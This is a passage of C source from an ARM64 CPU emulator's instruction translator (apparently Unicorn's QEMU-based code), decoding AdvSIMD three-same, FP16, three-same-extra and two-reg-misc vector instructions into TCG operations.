MO_64 : MO_32, rn, rm, rd); return; case 0x1b: /* FMULX */ case 0x1f: /* FRECPS */ case 0x3f: /* FRSQRTS */ case 0x5d: /* FACGE */ case 0x7d: /* FACGT */ case 0x19: /* FMLA */ case 0x39: /* FMLS */ case 0x18: /* FMAXNM */ case 0x1a: /* FADD */ case 0x1c: /* FCMEQ */ case 0x1e: /* FMAX */ case 0x38: /* FMINNM */ case 0x3a: /* FSUB */ case 0x3e: /* FMIN */ case 0x5b: /* FMUL */ case 0x5c: /* FCMGE */ case 0x5f: /* FDIV */ case 0x7a: /* FABD */ case 0x7c: /* FCMGT */ if (!fp_access_check(s)) { return; } handle_3same_float(s, size, elements, fpopcode, rd, rn, rm); return; case 0x1d: /* FMLAL */ case 0x3d: /* FMLSL */ case 0x59: /* FMLAL2 */ case 0x79: /* FMLSL2 */ if (size & 1 || !dc_isar_feature(aa64_fhm, s)) { unallocated_encoding(s); return; } if (fp_access_check(s)) { int is_s = extract32(insn, 23, 1); int is_2 = extract32(insn, 29, 1); int data = (is_2 << 1) | is_s; tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), tcg_ctx->cpu_env, is_q ? 16 : 8, vec_full_reg_size(s), data, gen_helper_gvec_fmlal_a64); } return; default: unallocated_encoding(s); return; } } /* Integer op subgroup of C3.6.16. */ static void disas_simd_3same_int(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int is_q = extract32(insn, 30, 1); int u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int opcode = extract32(insn, 11, 5); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); int pass; TCGCond cond; switch (opcode) { case 0x13: /* MUL, PMUL */ if (u && size != 0) { unallocated_encoding(s); return; } /* fall through */ case 0x0: /* SHADD, UHADD */ case 0x2: /* SRHADD, URHADD */ case 0x4: /* SHSUB, UHSUB */ case 0xc: /* SMAX, UMAX */ case 0xd: /* SMIN, UMIN */ case 0xe: /* SABD, UABD */ case 0xf: /* SABA, UABA */ case 0x12: /* MLA, MLS */ if (size == 3) { unallocated_encoding(s); return; } break; case 0x16: /* SQDMULH, SQRDMULH */ if (size == 0 || size == 3) { unallocated_encoding(s); return; } break; default: if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; } if (!fp_access_check(s)) { return; } switch (opcode) { case 0x01: /* SQADD, UQADD */ tcg_gen_gvec_4(tcg_ctx, vec_full_reg_offset(s, rd), offsetof(CPUARMState, vfp.qc), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s), (u ? uqadd_op : sqadd_op) + size); return; case 0x05: /* SQSUB, UQSUB */ tcg_gen_gvec_4(tcg_ctx, vec_full_reg_offset(s, rd), offsetof(CPUARMState, vfp.qc), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s), (u ? uqsub_op : sqsub_op) + size); return; case 0x08: /* SSHL, USHL */ gen_gvec_op3(s, is_q, rd, rn, rm, u ? &ushl_op[size] : &sshl_op[size]); return; case 0x0c: /* SMAX, UMAX */ if (u) { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_umax, size); } else { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_smax, size); } return; case 0x0d: /* SMIN, UMIN */ if (u) { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_umin, size); } else { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_smin, size); } return; case 0x10: /* ADD, SUB */ if (u) { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_sub, size); } else { gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_add, size); } return; case 0x13: /* MUL, PMUL */ if (!u) { /* MUL */ gen_gvec_fn3(s, is_q, rd, rn, rm, tcg_gen_gvec_mul, size); } else { /* PMUL */ gen_gvec_op3_ool(s, is_q, rd, rn, rm, 0, gen_helper_gvec_pmul_b); } return; case 0x12: /* MLA, MLS */ if (u) { gen_gvec_op3(s, is_q, rd, rn, rm, &mls_op[size]); } else { gen_gvec_op3(s, is_q, rd, rn, rm, &mla_op[size]); } return; case 0x11: if (!u) { /* CMTST */ gen_gvec_op3(s, is_q, rd, rn, rm, &cmtst_op[size]); return; } /* else CMEQ */ cond = TCG_COND_EQ; goto do_gvec_cmp; case 0x06: /* CMGT, CMHI */ cond = u ? TCG_COND_GTU : TCG_COND_GT; goto do_gvec_cmp; case 0x07: /* CMGE, CMHS */ cond = u ? TCG_COND_GEU : TCG_COND_GE; do_gvec_cmp: tcg_gen_gvec_cmp(tcg_ctx, cond, size, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s)); return; } if (size == 3) { assert(is_q); for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); handle_3same_64(s, opcode, u, tcg_res, tcg_op1, tcg_op2); write_vec_element(s, tcg_res, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); } } else { for (pass = 0; pass < (is_q ? 4 : 2); pass++) { TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); NeonGenTwoOpFn *genfn = NULL; NeonGenTwoOpEnvFn *genenvfn = NULL; read_vec_element_i32(s, tcg_op1, rn, pass, MO_32); read_vec_element_i32(s, tcg_op2, rm, pass, MO_32); switch (opcode) { case 0x0: /* SHADD, UHADD */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_hadd_s8, gen_helper_neon_hadd_u8 }, { gen_helper_neon_hadd_s16, gen_helper_neon_hadd_u16 }, { gen_helper_neon_hadd_s32, gen_helper_neon_hadd_u32 }, }; genfn = fns[size][u]; break; } case 0x2: /* SRHADD, URHADD */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_rhadd_s8, gen_helper_neon_rhadd_u8 }, { gen_helper_neon_rhadd_s16, gen_helper_neon_rhadd_u16 }, { gen_helper_neon_rhadd_s32, gen_helper_neon_rhadd_u32 }, }; genfn = fns[size][u]; break; } case 0x4: /* SHSUB, UHSUB */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_hsub_s8, gen_helper_neon_hsub_u8 }, { gen_helper_neon_hsub_s16, gen_helper_neon_hsub_u16 }, { gen_helper_neon_hsub_s32, gen_helper_neon_hsub_u32 }, }; genfn = fns[size][u]; break; } case 0x9: /* SQSHL, UQSHL */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qshl_s8, gen_helper_neon_qshl_u8 }, { gen_helper_neon_qshl_s16, gen_helper_neon_qshl_u16 }, { gen_helper_neon_qshl_s32, gen_helper_neon_qshl_u32 }, }; genenvfn = fns[size][u]; break; } case 0xa: /* SRSHL, URSHL */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_rshl_s8, gen_helper_neon_rshl_u8 }, { gen_helper_neon_rshl_s16, gen_helper_neon_rshl_u16 }, { gen_helper_neon_rshl_s32, gen_helper_neon_rshl_u32 }, }; genfn = fns[size][u]; break; } case 0xb: /* SQRSHL, UQRSHL */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qrshl_s8, gen_helper_neon_qrshl_u8 }, { gen_helper_neon_qrshl_s16, gen_helper_neon_qrshl_u16 }, { gen_helper_neon_qrshl_s32, gen_helper_neon_qrshl_u32 }, }; genenvfn = fns[size][u]; break; } case 0xe: /* SABD, UABD */ case 0xf: /* SABA, UABA */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_abd_s8, gen_helper_neon_abd_u8 }, { gen_helper_neon_abd_s16, gen_helper_neon_abd_u16 }, { gen_helper_neon_abd_s32, gen_helper_neon_abd_u32 }, }; genfn = fns[size][u]; break; } case 0x16: /* SQDMULH, SQRDMULH */ { static NeonGenTwoOpEnvFn * const fns[2][2] = { { gen_helper_neon_qdmulh_s16, gen_helper_neon_qrdmulh_s16 }, { gen_helper_neon_qdmulh_s32, gen_helper_neon_qrdmulh_s32 }, }; assert(size == 1 || size == 2); genenvfn = fns[size - 1][u]; break; } default: g_assert_not_reached(); } if (genenvfn) { genenvfn(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op1, tcg_op2); } else { genfn(tcg_ctx, tcg_res, tcg_op1, tcg_op2); } if (opcode == 0xf) { /* SABA, UABA: accumulating ops */ static NeonGenTwoOpFn * const fns[3] = { gen_helper_neon_add_u8, gen_helper_neon_add_u16, tcg_gen_add_i32, }; read_vec_element_i32(s, tcg_op1, rd, pass, MO_32); fns[size](tcg_ctx, tcg_res, tcg_op1, tcg_res); } write_vec_element_i32(s, tcg_res, rd, pass, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); } } clear_vec_high(s, is_q, rd); } /* AdvSIMD three same * 31 30 29 28 24 23 22 21 20 16 15 11 10 9 5 4 0 * +---+---+---+-----------+------+---+------+--------+---+------+------+ * | 0 | Q | U | 0 1 1 1 0 | size | 1 | Rm | opcode | 1 | Rn | Rd | * +---+---+---+-----------+------+---+------+--------+---+------+------+ */ static void disas_simd_three_reg_same(DisasContext *s, uint32_t insn) { int opcode = extract32(insn, 11, 5); switch (opcode) { case 0x3: /* logic ops */ disas_simd_3same_logic(s, insn); break; case 0x17: /* ADDP */ case 0x14: /* SMAXP, UMAXP */ case 0x15: /* SMINP, UMINP */ { /* Pairwise operations */ int is_q = extract32(insn, 30, 1); int u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); if (opcode == 0x17) { if (u || (size == 3 && !is_q)) { unallocated_encoding(s); return; } } else { if (size == 3) { unallocated_encoding(s); return; } } handle_simd_3same_pair(s, is_q, u, opcode, size, rn, rm, rd); break; } case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: case 0x20: case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: case 0x26: case 0x27: case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: case 0x2e: case 0x2f: case 0x30: case 0x31: /* floating point ops, sz[1] and U are part of opcode */ disas_simd_3same_float(s, insn); break; default: disas_simd_3same_int(s, insn); break; } } /* * Advanced SIMD three same (ARMv8.2 FP16 variants) * * 31 30 29 28 24 23 22 21 20 16 15 14 13 11 10 9 5 4 0 * +---+---+---+-----------+---------+------+-----+--------+---+------+------+ * | 0 | Q | U | 0 1 1 1 0 | a | 1 0 | Rm | 0 0 | opcode | 1 | Rn | Rd | * +---+---+---+-----------+---------+------+-----+--------+---+------+------+ * * This includes FMULX, FCMEQ (register), FRECPS, FRSQRTS, FCMGE * (register), FACGE, FABD, FCMGT (register) and FACGT. * */ static void disas_simd_three_reg_same_fp16(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opcode, fpopcode; int is_q, u, a, rm, rn, rd; int datasize, elements; int pass; TCGv_ptr fpst; bool pairwise = false; if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* For these floating point ops, the U, a and opcode bits * together indicate the operation. */ opcode = extract32(insn, 11, 3); u = extract32(insn, 29, 1); a = extract32(insn, 23, 1); is_q = extract32(insn, 30, 1); rm = extract32(insn, 16, 5); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); fpopcode = opcode | (a << 3) | (u << 4); datasize = is_q ? 128 : 64; elements = datasize / 16; switch (fpopcode) { case 0x10: /* FMAXNMP */ case 0x12: /* FADDP */ case 0x16: /* FMAXP */ case 0x18: /* FMINNMP */ case 0x1e: /* FMINP */ pairwise = true; break; } fpst = get_fpstatus_ptr(tcg_ctx, true); if (pairwise) { int maxpass = is_q ? 8 : 4; TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res[8]; for (pass = 0; pass < maxpass; pass++) { int passreg = pass < (maxpass / 2) ? rn : rm; int passelt = (pass << 1) & (maxpass - 1); read_vec_element_i32(s, tcg_op1, passreg, passelt, MO_16); read_vec_element_i32(s, tcg_op2, passreg, passelt + 1, MO_16); tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); switch (fpopcode) { case 0x10: /* FMAXNMP */ gen_helper_advsimd_maxnumh(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x12: /* FADDP */ gen_helper_advsimd_addh(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x16: /* FMAXP */ gen_helper_advsimd_maxh(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x18: /* FMINNMP */ gen_helper_advsimd_minnumh(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; case 0x1e: /* FMINP */ gen_helper_advsimd_minh(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } } for (pass = 0; pass < maxpass; pass++) { write_vec_element_i32(s, tcg_res[pass], rd, pass, MO_16); tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); } tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); } else { for (pass = 0; pass < elements; pass++) { TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op1, rn, pass, MO_16); read_vec_element_i32(s, tcg_op2, rm, pass, MO_16); switch (fpopcode) { case 0x0: /* FMAXNM */ gen_helper_advsimd_maxnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1: /* FMLA */ read_vec_element_i32(s, tcg_res, rd, pass, MO_16); gen_helper_advsimd_muladdh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_res, fpst); break; case 0x2: /* FADD */ gen_helper_advsimd_addh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3: /* FMULX */ gen_helper_advsimd_mulxh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x4: /* FCMEQ */ gen_helper_advsimd_ceq_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x6: /* FMAX */ gen_helper_advsimd_maxh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7: /* FRECPS */ gen_helper_recpsf_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x8: /* FMINNM */ gen_helper_advsimd_minnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x9: /* FMLS */ /* As usual for ARM, separate negation for fused multiply-add */ tcg_gen_xori_i32(tcg_ctx, tcg_op1, tcg_op1, 0x8000); read_vec_element_i32(s, tcg_res, rd, pass, MO_16); gen_helper_advsimd_muladdh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_res, fpst); break; case 0xa: /* FSUB */ gen_helper_advsimd_subh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xe: /* FMIN */ gen_helper_advsimd_minh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0xf: /* FRSQRTS */ gen_helper_rsqrtsf_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x13: /* FMUL */ gen_helper_advsimd_mulh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x14: /* FCMGE */ gen_helper_advsimd_cge_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x15: /* FACGE */ gen_helper_advsimd_acge_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x17: /* FDIV */ gen_helper_advsimd_divh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1a: /* FABD */ gen_helper_advsimd_subh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); tcg_gen_andi_i32(tcg_ctx, tcg_res, tcg_res, 0x7fff); break; case 0x1c: /* FCMGT */ gen_helper_advsimd_cgt_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1d: /* FACGT */ gen_helper_advsimd_acgt_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: fprintf(stderr, "%s: insn %#04x, fpop %#2x @ %#" PRIx64 "\n", __func__, insn, fpopcode, s->pc_curr); g_assert_not_reached(); } write_vec_element_i32(s, tcg_res, rd, pass, MO_16); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); } } tcg_temp_free_ptr(tcg_ctx, fpst); clear_vec_high(s, is_q, rd); } /* AdvSIMD three same extra * 31 30 29 28 24 23 22 21 20 16 15 14 11 10 9 5 4 0 * +---+---+---+-----------+------+---+------+---+--------+---+----+----+ * | 0 | Q | U | 0 1 1 1 0 | size | 0 | Rm | 1 | opcode | 1 | Rn | Rd | * +---+---+---+-----------+------+---+------+---+--------+---+----+----+ */ static void disas_simd_three_reg_same_extra(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 4); int rm = extract32(insn, 16, 5); int size = extract32(insn, 22, 2); bool u = extract32(insn, 29, 1); bool is_q = extract32(insn, 30, 1); bool feature; int rot; switch (u * 16 + opcode) { case 0x10: /* SQRDMLAH (vector) */ case 0x11: /* SQRDMLSH (vector) */ if (size != 1 && size != 2) { unallocated_encoding(s); return; } feature = dc_isar_feature(aa64_rdm, s); break; case 0x02: /* SDOT (vector) */ case 0x12: /* UDOT (vector) */ if (size != MO_32) { unallocated_encoding(s); return; } feature = dc_isar_feature(aa64_dp, s); break; case 0x18: /* FCMLA, #0 */ case 0x19: /* FCMLA, #90 */ case 0x1a: /* FCMLA, #180 */ case 0x1b: /* FCMLA, #270 */ case 0x1c: /* FCADD, #90 */ case 0x1e: /* FCADD, #270 */ if (size == 0 || (size == 1 && !dc_isar_feature(aa64_fp16, s)) || (size == 3 && !is_q)) { unallocated_encoding(s); return; } feature = dc_isar_feature(aa64_fcma, s); break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } switch (opcode) { case 0x0: /* SQRDMLAH (vector) */ switch (size) { case 1: gen_gvec_op3_env(s, is_q, rd, rn, rm, gen_helper_gvec_qrdmlah_s16); break; case 2: gen_gvec_op3_env(s, is_q, rd, rn, rm, gen_helper_gvec_qrdmlah_s32); break; default: g_assert_not_reached(); } return; case 0x1: /* SQRDMLSH (vector) */ switch (size) { case 1: gen_gvec_op3_env(s, is_q, rd, rn, rm, gen_helper_gvec_qrdmlsh_s16); break; case 2: gen_gvec_op3_env(s, is_q, rd, rn, rm, gen_helper_gvec_qrdmlsh_s32); break; default: g_assert_not_reached(); } return; case 0x2: /* SDOT / UDOT */ gen_gvec_op3_ool(s, is_q, rd, rn, rm, 0, u ? gen_helper_gvec_udot_b : gen_helper_gvec_sdot_b); return; case 0x8: /* FCMLA, #0 */ case 0x9: /* FCMLA, #90 */ case 0xa: /* FCMLA, #180 */ case 0xb: /* FCMLA, #270 */ rot = extract32(opcode, 0, 2); switch (size) { case 1: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, true, rot, gen_helper_gvec_fcmlah); break; case 2: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, false, rot, gen_helper_gvec_fcmlas); break; case 3: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, false, rot, gen_helper_gvec_fcmlad); break; default: g_assert_not_reached(); } return; case 0xc: /* FCADD, #90 */ case 0xe: /* FCADD, #270 */ rot = extract32(opcode, 1, 1); switch (size) { case 1: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, size == 1, rot, gen_helper_gvec_fcaddh); break; case 2: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, size == 1, rot, gen_helper_gvec_fcadds); break; case 3: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, size == 1, rot, gen_helper_gvec_fcaddd); break; default: g_assert_not_reached(); } return; default: g_assert_not_reached(); } } static void handle_2misc_widening(DisasContext *s, int opcode, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Handle 2-reg-misc ops which are widening (so each size element * in the source becomes a 2*size element in the destination. * The only instruction like this is FCVTL. */ int pass; if (size == 3) { /* 32 -> 64 bit fp conversion */ TCGv_i64 tcg_res[2]; int srcelt = is_q ? 2 : 0; for (pass = 0; pass < 2; pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, srcelt + pass, MO_32); gen_helper_vfp_fcvtds(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); tcg_temp_free_i32(tcg_ctx, tcg_op); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } else { /* 16 -> 32 bit fp conversion */ int srcelt = is_q ? 4 : 0; TCGv_i32 tcg_res[4]; TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); TCGv_i32 ahp = get_ahp_flag(tcg_ctx); for (pass = 0; pass < 4; pass++) { tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_res[pass], rn, srcelt + pass, MO_16); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_res[pass], tcg_res[pass], fpst, ahp); } for (pass = 0; pass < 4; pass++) { write_vec_element_i32(s, tcg_res[pass], rd, pass, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); } tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, ahp); } } static void handle_rev(DisasContext *s, int opcode, bool u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op = (opcode << 1) | u; int opsz = op + size; int grp_size = 3 - opsz; int dsize = is_q ? 128 : 64; int i; if (opsz >= 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (size == 0) { /* Special case bytes, use bswap op on each group of elements */ int groups = dsize / (8 << grp_size); for (i = 0; i < groups; i++) { TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_tmp, rn, i, grp_size); switch (grp_size) { case MO_16: tcg_gen_bswap16_i64(tcg_ctx, tcg_tmp, tcg_tmp); break; case MO_32: tcg_gen_bswap32_i64(tcg_ctx, tcg_tmp, tcg_tmp); break; case MO_64: tcg_gen_bswap64_i64(tcg_ctx, tcg_tmp, tcg_tmp); break; default: g_assert_not_reached(); } write_vec_element(s, tcg_tmp, rd, i, grp_size); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } clear_vec_high(s, is_q, rd); } else { int revmask = (1 << grp_size) - 1; int esize = 8 << size; int elements = dsize / esize; TCGv_i64 tcg_rn = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_rd = tcg_const_i64(tcg_ctx, 0); TCGv_i64 tcg_rd_hi = tcg_const_i64(tcg_ctx, 0); for (i = 0; i < elements; i++) { int e_rev = (i & 0xf) ^ revmask; int off = e_rev * esize; read_vec_element(s, tcg_rn, rn, i, size); if (off >= 64) { tcg_gen_deposit_i64(tcg_ctx, tcg_rd_hi, tcg_rd_hi, tcg_rn, off - 64, esize); } else { tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_rn, off, esize); } } write_vec_element(s, tcg_rd, rd, 0, MO_64); write_vec_element(s, tcg_rd_hi, rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_rd_hi); tcg_temp_free_i64(tcg_ctx, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); } } static void handle_2misc_pairwise(DisasContext *s, int opcode, bool u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Implement the pairwise operations from 2-misc: * SADDLP, UADDLP, SADALP, UADALP. * These all add pairs of elements in the input to produce a * double-width result element in the output (possibly accumulating). */ bool accum = (opcode == 0x6); int maxpass = is_q ? 2 : 1; int pass; TCGv_i64 tcg_res[2]; if (size == 2) { /* 32 + 32 -> 64 op */ MemOp memop = size + (u ? 0 : MO_SIGN); for (pass = 0; pass < maxpass; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op1, rn, pass * 2, memop); read_vec_element(s, tcg_op2, rn, pass * 2 + 1, memop); tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); if (accum) { read_vec_element(s, tcg_op1, rd, pass, MO_64); tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); } tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); } } else { for (pass = 0; pass < maxpass; pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); NeonGenOneOpFn *genfn; static NeonGenOneOpFn * const fns[2][2] = { { gen_helper_neon_addlp_s8, gen_helper_neon_addlp_u8 }, { gen_helper_neon_addlp_s16, gen_helper_neon_addlp_u16 }, }; genfn = fns[size][u]; tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op, rn, pass, MO_64); genfn(tcg_ctx, tcg_res[pass], tcg_op); if (accum) { read_vec_element(s, tcg_op, rd, pass, MO_64); if (size == 0) { gen_helper_neon_addl_u16(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op); } else { gen_helper_neon_addl_u32(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op); } } tcg_temp_free_i64(tcg_ctx, tcg_op); } } if (!is_q) { tcg_res[1] = tcg_const_i64(tcg_ctx, 0); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } static void handle_shll(DisasContext *s, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Implement SHLL and SHLL2 */ int pass; int part = is_q ? 2 : 0; TCGv_i64 tcg_res[2]; for (pass = 0; pass < 2; pass++) { static NeonGenWidenFn * const widenfns[3] = { gen_helper_neon_widen_u8, gen_helper_neon_widen_u16, tcg_gen_extu_i32_i64, }; NeonGenWidenFn *widenfn = widenfns[size]; TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, part + pass, MO_32); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); widenfn(tcg_ctx, tcg_res[pass], tcg_op); tcg_gen_shli_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], 8 << size); tcg_temp_free_i32(tcg_ctx, tcg_op); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } /* AdvSIMD two reg misc * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 * +---+---+---+-----------+------+-----------+--------+-----+------+------+ * | 0 | Q | U | 0 1 1 1 0 | size | 1 0 0 0 0 | opcode | 1 0 | Rn | Rd | * +---+---+---+-----------+------+-----------+--------+-----+------+------+ */ static void disas_simd_two_reg_misc(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 5); bool u = extract32(insn, 29, 1); bool is_q = extract32(insn, 30, 1); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); bool need_fpstatus = false; bool need_rmode = false; int rmode = -1; TCGv_i32 tcg_rmode; TCGv_ptr tcg_fpstatus; switch (opcode) { case 0x0: /* REV64, REV32 */ case 0x1: /* REV16 */ handle_rev(s, opcode, u, is_q, size, rn, rd); return; case 0x5: /* CNT, NOT, RBIT */ if (u && size == 0) { /* NOT */ break; } else if (u && size == 1) { /* RBIT */ break; } else if (!u && size == 0) { /* CNT */ break; } unallocated_encoding(s); return; case 0x12: /* XTN, XTN2, SQXTUN, SQXTUN2 */ case 0x14: /* SQXTN, SQXTN2, UQXTN, UQXTN2 */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_narrow(s, false, opcode, u, is_q, size, rn, rd); return; case 0x4: /* CLS, CLZ */ if (size == 3) { unallocated_encoding(s); return; } break; case 0x2: 